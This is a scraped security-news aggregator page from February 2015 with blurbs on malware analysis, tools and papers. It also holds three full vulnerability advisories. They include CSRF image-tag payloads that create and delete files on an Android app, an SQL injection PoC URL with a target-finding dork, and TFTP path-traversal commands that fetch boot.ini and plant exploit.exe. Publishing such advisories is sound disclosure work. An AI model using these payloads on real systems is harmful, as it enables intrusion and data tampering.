Quantcast
Channel: BOT24
Viewing all 8064 articles
Browse latest View live

Dridex – Password Bypass, Extracting Macros, and Rot13

February 25, 2015, 8:48 am
$
0
0
When attackers decide to password protect something, it can be very frustrating as an analyst, because we are often left with few options to find out what they are protecting. If this happens, we can always try to straight up brute force the password, but unless the attackers use something like 1q2w3e4r, we’re up a creek without an oar. If it’s an MD5 hash of a password, we have many more options to crack it. In the case of xls files, we have the option to essentially “wipe out” the password and give it our own password. In a recent wave of Dridex phishing emails, this is what we saw

more here............http://phishme.com/dridex-password-bypass-extracting-macros-and-rot13/
Search

Extend Sulo to find the CVE of Flash exploits

February 25, 2015, 12:10 pm
$
0
0
In this blog, i like to discuss more about detecting the vulnerability triggered by a particular exploit using Sulo. I have extended it to detect few of the recent vulnerabilities. I have added code to detect CVE-2015-0310, CVE-2015-0311 and CVE-2015-0313. This is useful to security researchers who analyze flash exploits. Yes you can find those by parsing the output that Sulo produces but many a times exploit crashes the IE process before we get some interesting logs or log file size is too big and time consuming to analyze. I am sure we can extend it to detect few more vulnerabilities that is used in exploit kits. It will reduce the time needed to analyze (and identify CVE of ) exploit sample. I have seen cases where a single flash exploit exploits various vulnerabilities, in this case we will detect only one CVE. So in that case we definitely need manual analysis.

more here,,,,,,,,,,,,https://hiddencodes.wordpress.com/2015/02/25/extend-sulo-to-find-the-cve-of-flash-exploits/

My Favorite PowerShell Post-Exploitation Tools

February 25, 2015, 12:22 pm
$
0
0
PowerShell became a key part of my red team toolkit in 2014. Cobalt Strike 2.1 added PowerShell support to the Beacon payload and this has made an amazing library of capability available to my users. In this post, I’d like to take you through a few of my favorite collections of PowerShell scripts.

more here.........http://blog.cobaltstrike.com/2015/02/25/my-favorite-powershell-post-exploitation-tools/

Adventures in LDAP Injection: Exploiting and Fixing

February 25, 2015, 12:54 pm
$
0
0
Every pen tester looks forward to that next encounter that includes one of those uncommon vulnerabilities that ultimately result in an exciting session of exploration and learning.  During a recent web penetration test I ran across one of these rare gems when I started seeing some odd behavior on a forgot password form.  In this case I was fortunate to be working virtually across the table from a development team member who could verify our hypotheses by reading through the code.

more here...........http://blog.secureideas.com/2015/02/adventures-in-ldap-injection-exploiting.html

DDoS-for-Hire Preys Upon SaaS Apps such as Joomla

February 25, 2015, 12:59 pm
$
0
0
Akamai’s Prolexic Security Engineering & Research Team (PLXsert) and PhishLabs’ (R.A.I.D.) Research Analysis and Intelligence Division have worked together on a threat advisory that warns enterprises and Software-as-a-Service (SaaS) providers about new distributed denial of service (DDoS) attacks that leverage Joomla servers that have a vulnerable Google Maps plugin installed. The advisory is available for download from: www.stateoftheinternet.com/joomla-reflection. 

Malicious PNGs: What You See Is Not All You Get!

February 25, 2015, 5:11 pm
$
0
0
Threat actors are continually evolving their techniques. One of the latest Graftor variants is delivering a Malware DLL via a PNG file delivery mechanism. Graftor basically indicates some type of trojan hiding in a piece of software. Hiding executables and DLLs in PNG files is yet another attempt to avoid detection and deliver malicious content to user systems. In this instance, the malicious content is placed at the end of the real PNG file data.

more here........http://blogs.cisco.com/security/talos/malicious-pngs

Bootkit Disk Forensics - Part 1

February 26, 2015, 1:55 am
$
0
0
Recently I got the idea to play around with bypassing bootkit disk filters from an email i received, which highlighted that my MBR spoofing code was able to get underneath the driver of a popular forensics tool, preventing it from reading the real disk sectors. Although I believe disk forensics should not be done on a live system, instead the disk should be mounted on a clean system and examined from there, I thought it would be fun to write a tool for bypassing various bootkit drivers and then post my research. Another email I received requested that I show how one would detect the presence of such filters from WinDbg, So I will try to cover both.

more here..........http://www.malwaretech.com/2015/02/bootkit-disk-forensics-part-1.html

[Exploit] Seagate BlackArmor Network Storage System

February 26, 2015, 2:02 am
$
0
0
The Seagate BlackArmor network storage system is susceptible to a root command injection vulnerability, which allows an attacker to inject and execute arbitrary system commands. ISE created a proof of concept that when executed, grants an attacker full administrative control of the affected system.

more here.........http://infosec42.blogspot.de/2015/02/exploit-seagate-blackarmor-network.html
Search

Prohibiting RC4 Cipher Suites

February 26, 2015, 2:05 am
$
0
0
If you’ve been following the drafts of this RFC, then nothing here will surprise you. The first draft was published on July 21, 2014, and, a short seven months later, RFC 7465 has been published. It’s a great idea for an RFC that I’d like to see used more frequently, but more on that in a moment.

more here........http://www.tripwire.com/state-of-security/security-awareness/prohibiting-rc4-cipher-suites/

Webnic Registrar Blamed for Hijack of Lenovo, Google Domains

February 26, 2015, 2:07 am
$
0
0
Two days ago, attackers allegedly associated with the fame-seeking group Lizard Squad briefly hijacked Google’s Vietnam domain (google.com.vn). On Wednesday, Lenovo.com was similarly attacked. Sources now tell KrebsOnSecurity that both hijacks were possible because the attackers seized control over Webnic.cc, the Malaysian registrar that serves both domains and 600,000 others.

more here.......http://krebsonsecurity.com/2015/02/webnic-registrar-blamed-for-hijack-of-lenovo-google-domains/

Paper: Kizzle: A Signature Compiler for Exploit Kits

February 26, 2015, 2:12 am
$
0
0
In recent years, the drive-by malware
space has undergone significant consolidation. Today,
the most common source of drive-by downloads are
the so-called exploit kits. Exploit kits signify a drastic
consolidation of the process of malware creation and
delivery. Exploit kit authors are often significantly
more skillful and better financially motivated than an
average “standalone” JavaScript malware author. This
paper presents Kizzle, the first prevention technique
specifically designed for finding exploit kits.

more here............http://research.microsoft.com/pubs/240495/tr.pdf

YSO-Mobile-Security-Framework

February 26, 2015, 2:18 am
$
0
0
YSO Mobile Security Framework is an intelligent, all-in-one open source mobile application (Android/iOS) automated pen-testing framework capable of performing static and dynamic analysis. We've been depending on multiple tools to carry out reversing, decoding, debugging, code review, and pen-test and this process requires a lot of effort and time. YSO Mobile Security Framework can be used for effective and fast security analysis of Android APK/Android app source code/iOS app source code.

more here...........https://github.com/ajinabraham/YSO-Mobile-Security-Framework

D-Link and TRENDnet 'ncc2' service - multiple vulnerabilities

February 26, 2015, 2:23 am
$
0
0
Local network; unauthenticated access.
Remote network; unauthenticated access*.
Remote network; 'drive-by' via CSRF.

more here.......https://github.com/darkarnium/secpub/tree/master/Multivendor/ncc2

phpcodz

February 26, 2015, 2:33 am
$
0
0
This project analyzes php security vulnerabilities here........https://github.com/80vul/phpcodz

The Enemy on your Phone

February 26, 2015, 3:11 am
$
0
0
Many people believe that there are no malware programs on smartphones. There was a time when there was some truth in this. A few years ago mobile platform operators originally designed their products with very high security levels. Mobile operating systems did not allow malicious programs to easily seize control and make themselves at home on devices.

Sadly that's no longer the case.

more here.......https://securelist.com/analysis/publications/68916/the-enemy-on-your-phone/
Search

Wireless File Transfer Pro Android - Multiple CSRF Vulnerabilities

February 26, 2015, 4:05 am
$
0
0
Document Title:
===============
Wireless File Transfer Pro Android - CSRF Vulnerabilities


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1437


Release Date:
=============
2015-02-25


Vulnerability Laboratory ID (VL-ID):
====================================
1437


Common Vulnerability Scoring System:
====================================
2.3


Product & Service Introduction:
===============================
Wireless File Transfer Pro is the advanced version of Wireless File Transfer.

(Copy of the Vendor Homepage: https://play.google.com/store/apps/details?id=com.lextel.WirelessFileTransferPro )


Abstract Advisory Information:
==============================
An independent vulnerability laboratory researcher discovered multiple cross site request forgery web vulnerabilities in the Wireless File Transfer Pro v1.0.1 mobile android application.


Vulnerability Disclosure Timeline:
==================================
2015-02-25:     Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
Lextel Technology
Product: Wireless File Transfer Pro - (Android) Web Application UI 5.9.5 - 1.0.1


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Technical Details & Description:
================================
Multiple cross site request forgery issues has been discovered in the Wireless File Transfer Pro 1.0.1 android mobile web-application.
The mobile web-application is vulnerable to a combination of cross site request forgery and local command injection attacks.


Proof of Concept (PoC):
=======================
The vulnerabilities can be exploited by remote attackers without privileged application user account and with medium user interaction.
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.

Create New Folder

<img src="http://192.168.1.2:8888/fileExplorer.html?action=create&type=folder&folderName=test1" width="0" height="0" border="0">

--- PoC Session Logs [GET] (Execution) ---
GET /fileExplorer.html?action=create&type=folder&folderName=test1 HTTP/1.1
Host: 192.168.1.2:8888
User-Agent: Mozilla/5.0 (Windows NT 5.2; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.2:8888/fileExplorer.html?action=brower&path=/sdcard
Connection: keep-alive

HTTP/1.1 200 OK
Cache-control: no-cache
Content-length: 4

<a href="#" onclick="actionBrower('/sdcard/test1')">test1</a></td></td><td width="24%"></td><td width="24%">2015-02-09 18:12:19</td><td width="15%">


Delete File, Folder

<img src="http://192.168.1.2:8888/fileExplorer.html?action=deleteFile&fileName=test""width="0" height="0" border="0">

--- PoC Session Logs [GET] (Execution) ---
GET /fileExplorer.html?action=deleteFile&fileName=test HTTP/1.1
Host: 192.168.1.2:8888
User-Agent: Mozilla/5.0 (Windows NT 5.2; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.2:8888/fileExplorer.html?action=brower&path=/sdcard
Connection: keep-alive

HTTP/1.1 200 OK
Cache-control: no-cache
Content-length: 30

Reference:
http://localhost:8888/


Security Risk:
==============
The security risk of the cross site request forgery web vulnerability in the create and delete function is estimated as medium. (CVSS 2.3)


Credits & Authors:
==================
Hadji Samir [s-dz@hotmail.fr]


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,
policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com           - www.vuln-lab.com                                      - www.evolution-sec.com
Contact:    admin@vulnerability-lab.com         - research@vulnerability-lab.com                        - admin@evolution-sec.com
Section:    magazine.vulnerability-db.com       - vulnerability-lab.com/contact.php                     - evolution-sec.com/contact
Social:     twitter.com/#!/vuln_lab             - facebook.com/VulnerabilityLab                         - youtube.com/user/vulnerability0lab
Feeds:      vulnerability-lab.com/rss/rss.php   - vulnerability-lab.com/rss/rss_upcoming.php            - vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php    - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.

                                Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™

Data Source: Scopus CMS - SQL Injection Web Vulnerability

February 26, 2015, 4:06 am
$
0
0
Document Title:
===============
Data Source: Scopus CMS - SQL Injection Web Vulnerability


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1436


Release Date:
=============
2015-02-25


Vulnerability Laboratory ID (VL-ID):
====================================
1436


Common Vulnerability Scoring System:
====================================
8.9


Abstract Advisory Information:
==============================
An independent security team of the vulnerability laboratory discovered a critical sql injection web vulnerability in the official Data Source Scopus Content Management System.


Vulnerability Disclosure Timeline:
==================================
2015-02-25:     Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Critical


Technical Details & Description:
================================
A remote sql injection web vulnerability has been discovered in the official Data Source Scopus Content Management System.
The vulnerability allows remote attacker to inject own sql commands to compromise the affected database management system.

The vulnerability is located in the `w` value of the `countrysearch.php` file. Remote attackers are able to compromise the
application & dbms by manipulation of the `w` value in the `countrysearch.php` file. The issue is a classic order by injection.
The request method to inject own commands is GET and the issue is located on the applicaiton-side of the service.

The security risk of the sql injection vulnerability is estimated as critical with a cvss (common vulnerability scoring system) count of 8.9.
Exploitation of the remote sql injection web vulnerability requires no user interaction or privileged web-application user account.
Successful exploitation of the remote sql injection results in dbms, web-server and web-application compromise.

Request Method(s):
                                [+] GET

Vulnerable File(s):
                                [+] countrysearch.php

Vulnerable Parameter(s):
                                [+] w


Proof of Concept (PoC):
=======================
The remote sql injection web vulnerability can be exploited by remote attackers without privileged application user account or user interaction.
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.

PoC: Example
http://[localhost]/[PATH]/[FILE].php?w=-[SQL INJECCTION VULNERABILITY]'--

PoC: Demonstration
http://www.server.com/countrysearch.php?w=world%27-[SQL INJECCTION VULNERABILITY]'--

Dork(s):
inurl:".php?w="


Solution - Fix & Patch:
=======================
The vulnerability can be patched by usage of the preapred statement in connection with a secure encode/parse of the w value in the countrysearch.php file.
Restrict the w value input and filter by disallowing input of special chars or negative values. Disable php script error(0);!


Security Risk:
==============
The security risk of the remote sql injection web vulnerability in the countrysearch.php file is estimated as critical.


Credits & Authors:
==================
[GuardIran Security Team] P0!s0nC0d3 - (http://www.guardiran.org)


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,
policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com           - www.vuln-lab.com                                      - www.evolution-sec.com
Contact:    admin@vulnerability-lab.com         - research@vulnerability-lab.com                        - admin@evolution-sec.com
Section:    magazine.vulnerability-db.com       - vulnerability-lab.com/contact.php                     - evolution-sec.com/contact
Social:     twitter.com/#!/vuln_lab             - facebook.com/VulnerabilityLab                         - youtube.com/user/vulnerability0lab
Feeds:      vulnerability-lab.com/rss/rss.php   - vulnerability-lab.com/rss/rss_upcoming.php            - vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php    - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.

                                Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™

DSS TFTP 1.0 Server - Path Traversal Vulnerability

February 26, 2015, 4:06 am
$
0
0
Document Title:
===============
DSS TFTP 1.0 Server - Path Traversal Vulnerability


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1440


Release Date:
=============
2015-02-26


Vulnerability Laboratory ID (VL-ID):
====================================
1440


Common Vulnerability Scoring System:
====================================
6.2


Product & Service Introduction:
===============================
DSS TFTP 1.0 Server is a simple TFTP server that allows basic file transfers.

(Download: http://www.kndata.com/downloads/ )


Abstract Advisory Information:
==============================
An independent vulnerability laboratory researcher discovered a path traversal vulnerability in the official DSS TFTP 1.0 Server software.


Vulnerability Disclosure Timeline:
==================================
2015-02-26:     Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Exploitation Technique:
=======================
Remote


Severity Level:
===============
High


Technical Details & Description:
================================
DSS TFTP 1.0 Server is a simple TFTP server that allows user to download/upload files through the TFTP service from/to specified tftp root directory.
However, application is vulnerable to path traversal that enables attacker to download/upload files outside the tftp root directory.


Proof of Concept (PoC):
=======================
The vulnerability can be exploited by remote attackers without user interaction or privileged application user account.
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.

GET file from server
tftp -i 192.168.56.101 GET .../boot.ini

PUT file outside the tftp root directory
tftp -i 192.168.56.101 PUT exploit.exe .../exploit.exe


Security Risk:
==============
The security risk of the path traversal software vulnerability is estimated as high. (CVSS 6.2)


Credits & Authors:
==================
lucyoa


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,
policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com           - www.vuln-lab.com                                      - www.evolution-sec.com
Contact:    admin@vulnerability-lab.com         - research@vulnerability-lab.com                        - admin@evolution-sec.com
Section:    magazine.vulnerability-db.com       - vulnerability-lab.com/contact.php                     - evolution-sec.com/contact
Social:     twitter.com/#!/vuln_lab             - facebook.com/VulnerabilityLab                         - youtube.com/user/vulnerability0lab
Feeds:      vulnerability-lab.com/rss/rss.php   - vulnerability-lab.com/rss/rss_upcoming.php            - vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php    - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.

                                Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™

GDB 'exploitable' plugin

February 26, 2015, 7:03 am
$
0
0
'exploitable' is a GDB extension that classifies Linux application bugs by severity. The extension inspects the state of a Linux application that has crashed and outputs a summary of how difficult it might be for an attacker to exploit the underlying software bug to gain control of the system. The extension can be used to prioritize bugs for software developers so that they can address the most severe ones first

more here......https://github.com/jfoote/exploitable

Paper: Security in VANETs

February 26, 2015, 8:48 am
$
0
0
Abstract:
Vehicular Ad­hoc Networks (VANETs) are gaining growing interest and research efforts over recent
years for it offers enhanced safety and enriched travel comfort. However, security concerns that are
either general seen in ad­hoc networks or unique to VANET present great challenges. This paper surveys recent advances in research that aim to strengthen security from an architectural and systematic approach. Proposals on specific security issues are also presented and their key results summarized.

more here...........http://www.cse.wustl.edu/~jain/cse571-14/ftp/vanet_security.pdf
Viewing all 8064 articles
Browse latest View live
Search